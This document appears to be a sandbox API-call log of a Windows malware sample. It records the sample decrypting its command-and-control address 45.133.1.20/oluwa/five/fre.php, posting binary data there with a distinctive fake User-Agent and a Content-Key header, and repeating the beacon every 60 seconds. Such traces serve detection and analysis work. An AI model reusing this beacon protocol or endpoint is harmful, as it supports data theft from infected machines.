[0191.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.555] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0191.556] GetProcessHeap () returned 0x6a0000 [0191.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0191.559] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.559] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0191.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.560] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0191.561] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.562] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0191.562] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.563] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0191.563] GetProcessHeap () returned 0x6a0000 [0191.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0191.563] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0191.563] GetProcessHeap () returned 0x6a0000 [0191.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0191.564] GetProcessHeap () returned 0x6a0000 [0191.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0191.564] GetProcessHeap () returned 0x6a0000 [0191.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0191.565] GetProcessHeap () returned 0x6a0000 [0191.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0191.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.566] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.573] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0191.582] GetProcessHeap () returned 0x6a0000 [0191.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0191.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.583] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0191.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.584] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.585] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.585] GetProcessHeap () returned 0x6a0000 [0191.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0191.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.587] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0191.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.589] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0191.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.590] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0191.590] GetProcessHeap () returned 0x6a0000 [0191.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0191.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.591] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0191.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.593] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0191.593] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.594] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0191.595] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.595] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0191.595] GetProcessHeap () returned 0x6a0000 [0191.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0191.595] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0191.595] GetProcessHeap () returned 0x6a0000 [0191.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0191.595] socket (af=2, type=1, protocol=6) returned 0x49c [0191.596] connect (s=0x49c, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0191.618] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0191.618] GetProcessHeap () returned 0x6a0000 [0191.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0191.618] GetProcessHeap () returned 0x6a0000 [0191.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0191.619] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0191.621] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0191.621] GetProcessHeap () returned 0x6a0000 [0191.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0191.621] GetProcessHeap () returned 0x6a0000 [0191.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0191.621] GetProcessHeap () returned 0x6a0000 [0191.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0191.621] GetProcessHeap () returned 0x6a0000 [0191.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0191.622] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0191.623] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0191.623] GetProcessHeap () returned 0x6a0000 [0191.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0191.623] GetProcessHeap () returned 0x6a0000 [0191.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0191.624] send (s=0x49c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0191.625] send (s=0x49c, buf=0x6bb998*, len=159, flags=0) returned 159 [0191.625] GetProcessHeap () returned 0x6a0000 [0191.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0191.625] recv (in: s=0x49c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0191.689] GetProcessHeap () returned 0x6a0000 [0191.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0191.690] GetProcessHeap () returned 0x6a0000 [0191.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0191.691] GetProcessHeap () returned 0x6a0000 [0191.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0191.692] GetProcessHeap () returned 0x6a0000 [0191.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0191.692] closesocket (s=0x49c) returned 0 [0191.693] GetProcessHeap () returned 0x6a0000 [0191.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0191.693] GetProcessHeap () returned 0x6a0000 [0191.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0191.694] GetProcessHeap () returned 0x6a0000 [0191.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0191.694] GetProcessHeap () returned 0x6a0000 [0191.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0191.695] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1250) returned 0x49c [0191.697] Sleep (dwMilliseconds=0xea60) [0191.698] GetProcessHeap () returned 0x6a0000 [0191.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0191.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.700] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.707] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0191.713] GetProcessHeap () returned 0x6a0000 [0191.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0191.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.714] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0191.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.716] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.716] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.716] GetProcessHeap () returned 0x6a0000 [0191.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0191.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.718] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0191.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.719] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0191.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.720] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0191.720] GetProcessHeap () returned 0x6a0000 [0191.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0191.721] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.721] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0191.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.722] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0191.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.723] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0191.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.728] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0191.728] GetProcessHeap () returned 0x6a0000 [0191.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0191.728] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0191.728] GetProcessHeap () returned 0x6a0000 [0191.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0191.728] GetProcessHeap () returned 0x6a0000 [0191.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0191.729] GetProcessHeap () returned 0x6a0000 [0191.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0191.729] GetProcessHeap () returned 0x6a0000 [0191.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0191.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.731] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.737] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0191.778] GetProcessHeap () returned 0x6a0000 [0191.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0191.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.779] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0191.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.781] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.782] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.782] GetProcessHeap () returned 0x6a0000 [0191.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0191.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.784] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0191.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.785] CryptDestroyKey (hKey=0x6ad020) returned 1 [0191.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.786] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0191.786] GetProcessHeap () returned 0x6a0000 [0191.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0191.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.787] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0191.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.788] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0191.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.789] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0191.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.790] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0191.790] GetProcessHeap () returned 0x6a0000 [0191.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0191.790] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0191.790] GetProcessHeap () returned 0x6a0000 [0191.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0191.790] socket (af=2, type=1, protocol=6) returned 0x4a0 [0191.791] connect (s=0x4a0, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0191.816] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0191.816] GetProcessHeap () returned 0x6a0000 [0191.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0191.816] GetProcessHeap () returned 0x6a0000 [0191.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0191.817] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0191.818] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0191.818] GetProcessHeap () returned 0x6a0000 [0191.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0191.818] GetProcessHeap () returned 0x6a0000 [0191.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0191.819] GetProcessHeap () returned 0x6a0000 [0191.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0191.819] GetProcessHeap () returned 0x6a0000 [0191.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0191.820] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0191.820] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0191.821] GetProcessHeap () returned 0x6a0000 [0191.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0191.821] GetProcessHeap () returned 0x6a0000 [0191.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0191.821] send (s=0x4a0, buf=0x6b5c98*, len=242, flags=0) returned 242 [0191.822] send (s=0x4a0, buf=0x6bb998*, len=159, flags=0) returned 159 [0191.822] GetProcessHeap () returned 0x6a0000 [0191.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0191.822] recv (in: s=0x4a0, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0191.903] GetProcessHeap () returned 0x6a0000 [0191.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0191.904] GetProcessHeap () returned 0x6a0000 [0191.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0191.905] GetProcessHeap () returned 0x6a0000 [0191.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0191.908] GetProcessHeap () returned 0x6a0000 [0191.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0191.908] closesocket (s=0x4a0) returned 0 [0191.909] GetProcessHeap () returned 0x6a0000 [0191.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0191.909] GetProcessHeap () returned 0x6a0000 [0191.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0191.909] GetProcessHeap () returned 0x6a0000 [0191.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0191.910] GetProcessHeap () returned 0x6a0000 [0191.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0191.910] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1264) returned 0x4a0 [0191.911] Sleep (dwMilliseconds=0xea60) [0191.913] GetProcessHeap () returned 0x6a0000 [0191.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0191.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.914] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.922] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0191.928] GetProcessHeap () returned 0x6a0000 [0191.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0191.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.929] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0191.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.931] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.932] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.935] GetProcessHeap () returned 0x6a0000 [0191.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0191.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.937] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0191.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.938] CryptDestroyKey (hKey=0x6ad020) returned 1 [0191.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.939] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0191.939] GetProcessHeap () returned 0x6a0000 [0191.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0191.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.940] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0191.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.941] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0191.942] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 